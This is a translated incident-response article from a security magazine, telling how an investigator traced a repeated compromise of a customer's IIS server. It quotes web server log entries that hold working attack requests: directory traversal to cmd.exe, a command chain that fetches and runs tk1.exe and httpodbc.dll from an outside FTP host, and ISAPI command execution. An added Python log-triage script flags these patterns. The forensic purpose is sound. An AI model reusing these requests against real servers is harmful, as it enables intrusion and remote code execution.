
1 Ordibehesht 1383: Cyrus Peikari, Seth Fogie: Rooted by Tkbot.R00T.Edition.Final

The document discusses a case where a customer's internet connection was slowed due to hackers compromising their server. The author discovered that the main connection server had been repeatedly infected with viruses and hacked by hackers using common vulnerabilities. The hackers were able to take control of the server and use it as a "warez" server hosting over 3GB of illegal software. The author advised cleaning and reinstalling the server from scratch with necessary security updates. Upon investigating the server files, the author found that both the web server and backdoor program were no longer responding, indicating they were no longer active.

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)

Face to Face with All Kinds of Hackers

Part Three
Translator: Reza Madadi
Date: 1 Ordibehesht 1383
Authors: Cyrus Peikari, Seth Fogie

It all started with a simple call from a worried customer. His concern and complaint was a drop in the speed of his machine's Internet connection. Starting from that simple matter, I eventually found that the main Internet connection server had repeatedly fallen victim to viruses and hackers. Using public exploit code, the hackers had taken over IIS and with it the customer's computer, and had even been able to turn it into a warez server hosting more than 3 gigabytes of illegal software.

As a result, I told the customer that he now had to clean the server immediately and bring it up again from scratch with all the necessary Service Packs installed. After discussing possible protective measures with the customer, I quickly began examining the server's files remotely and collecting as much information as I could about the methods and tricks the hackers had used to take control of the server. However, after about two hours of digging, I quickly realized that both the web server and my backdoor program (Back Door) had stopped responding and were no longer active.

This is where we pick up this real case. So, without further ado, let us continue the story.

Rooted by Tkbot.R00t.EDITiON.FiNAL

That was where we had left off: I had no way of reaching the server remotely. My first guess was that the server administrator had taken the server down. But by pinging it and scanning its ports, I quickly found that the server was not offline and was still active. A phone call to the administrator told me that he had not yet done anything.

www.WebSecurityMgz.com

Interestingly, the port scan returned the same open ports as before, plus two ports, 1297 and 65130, and minus two ports, 80 (the web server) and 99, which is used by ncx99.exe. Since I had no other option, I decided to connect to these two new ports with Telnet and FTP clients to see what information they returned. To my surprise, it appeared that the server had once again fallen victim to another hacker (as you can see in Figure 1). In this case, however, the hacker had taken care to remove the methods other hackers had used to gain access to the server.

Figure 1: Telnet connection to port 65130 on the hacked server

After several attempts at guessing various common passwords, I called the server administrator again to hear the latest from him. In that call I also asked his permission to examine the server at the site where the machine was located, and asked him to give me the administrator account (Account) information needed to access the server.

The Game Begins: Day Two, Afternoon

I could not get to the site until the following afternoon. However, I used the time I had until then to devise a possible approach for reaching my goal. After thinking through the available options, it became clear to me that the best way to find out how the hacker had been able to install his information-stealing program was to obtain one of the Telnet or FTP passwords the hacker used when logging in to the system. I also planned to take a close look at the log files and the file system to see whether any changes related to this predicament could be found in the previous 24 hours. Although this was a shot in the dark, in the end it paid off handsomely and, interestingly, gave me an answer I had not been looking for at all.

When I arrived at the site, I immediately set up shop. Because the site used a hub-based network rather than a switched one, I could easily connect my laptop to the network and start sniffing network traffic from there.

Hubs broadcast data to all ports and leave it to each device to decide which packets were sent to it. Switches, on the other hand, keep track of the hardware address of every device connected to the network and send data to a port only if that data is meant for that port. This makes sniffing on a switched network somewhat more difficult and challenging.

My goal was to collect the data and analyze it later at a convenient time. To make this easier, I ran Tcpdump on my computer, which was running Linux, and configured it to save the captured data to a file on the hard disk. With that done, I began searching the server's file system, its network connections, and its running and previously run services.

I started with NetStat, which gives its user information about network connections. As you can see in Figure 2, several suspicious connections were very obvious (note the connections to IRC servers). I then took a look at the Task list, which shows the programs running on the computer, and noticed an unusual service named FireDaemon. After an online search I did on the spot, I learned that FireDaemon is a utility that lets you install and run virtually any native Win32 program or script (such as BAT/CMD, Perl, Java, Python) as an NT/2K/XP service. In other words, this software makes a hacker's dreams come true. By installing a Root Kit as a service, the hacker can simply guarantee that the Root Kit will run even if the server is rebooted.

Figure 2: NetStat output on the hacked server.

Finally, I began digging inside the server to see whether I could find out how the hacker had got in. I started with the web server logs and found the entries shown in Listing 1.

209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe,

209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, 83250, 270, 148, 200, 0, GET, /scripts/script.exe, /c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>tmp2&&[email protected]>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd,

209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,

209.115.xxx.xxx, -, 10/31/02, 16:06:26, W3SVC, EXCHANGE, 64.3.xxx.xxx, 828, 174, 576, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+del+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,

Following these entries as a trail, I arrived at a particular folder and found three files there: tmp2, tmp2.cmd and httpodbc.dll. I opened the first two in NotePad and saw that one of them was an FTP command file and the other was a batch file (Batch), which had downloaded the files tk1.exe and httpodbc.dll (a file commonly used by the Nimda worm). Since the FTP command file pointed to a server that used a public account, I also logged in to that FTP server, which was still running, and obtained a copy of the file for my later investigation.
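One way to triage web server log entries like those in Listing 1, as an added example that is not part of the original article: it parses the comma-separated IIS log format, URL-decodes each request, and tags the traversal to cmd.exe, the executable run from /scripts, the FTP script staging and the httpodbc.dll command execution. The rule names, field labels and the benign sample line are assumptions made for illustration; the second Listing 1 entry is abridged.

```python
import re
from urllib.parse import unquote_plus

# Field order of the comma-separated Microsoft IIS log file format.
FIELDS = ("client", "user", "date", "time", "service", "server", "server_ip",
          "ms", "bytes_in", "bytes_out", "status", "win32", "method",
          "target", "params")

# Tag -> pattern, matched against the URL-decoded, lower-cased request.
RULES = {
    "dir-traversal": re.compile(r"\.\.[\\/]"),
    "cmd-shell": re.compile(r"cmd\.exe"),
    "exe-in-scripts": re.compile(r"^/scripts/[\w.-]+\.exe\b"),
    "isapi-cmd-exec": re.compile(r"httpodbc\.dll.*mfcisapicommand="),
    "ftp-script": re.compile(r"ftp -s:"),
}

def parse(line):
    """Split one log line into named fields; params may itself hold commas."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",", 14)]
    parts += [""] * (len(FIELDS) - len(parts))
    return dict(zip(FIELDS, parts))

def decode(text, rounds=3):
    """URL-decode repeatedly so %5c and double-encoded %255c both surface."""
    for _ in range(rounds):
        text = unquote_plus(text)
    return text.lower()

def triage(lines):
    """Return (time, client, status, tags) for each suspicious request."""
    hits = []
    for line in filter(str.strip, lines):
        rec = parse(line)
        request = decode(rec["target"] + " " + rec["params"])
        tags = sorted(t for t, rx in RULES.items() if rx.search(request))
        if tags:
            hits.append((rec["time"], rec["client"], rec["status"], tags))
    return hits

SAMPLE = [  # Listing 1 entries (second one abridged) plus a constructed benign line
    r"192.0.2.10, -, 10/31/02, 15:58:02, W3SVC, EXCHANGE, 64.3.xxx.xxx, 47, 210, 4312, 200, 0, GET, /default.htm, -,",
    r"209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe,",
    r"209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, 83250, 270, 148, 200, 0, GET, /scripts/script.exe, /c+echo+open+209.184.xxx.xxx>tmp2&&echo+get+tk1.exe>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&tmp2.cmd,",
    r"209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,",
]

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

A status of 200 on a tagged request, as in every Listing 1 entry, means the server served it, so those hits deserve attention before any that were rejected.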
As I continued searching the server, it became clear to me that this particular hack was the reason the web server was offline and also the reason two new ports were open on the server. This belief was based on the fact that the download of tk1.exe had taken place seconds before the web server's log file went empty; in addition, the FTP server that was then running on port 65130 showed a "TK DISTRO" operation.

At this point, I got ready to go home. Given the NetStat results and the newly obtained information about the mysterious TK file, I guessed that this particular hack was a combined FTP/Back Door/IRC Trojan horse, all packed into a single file (tk1.exe). In any case, this theory seemed valid.
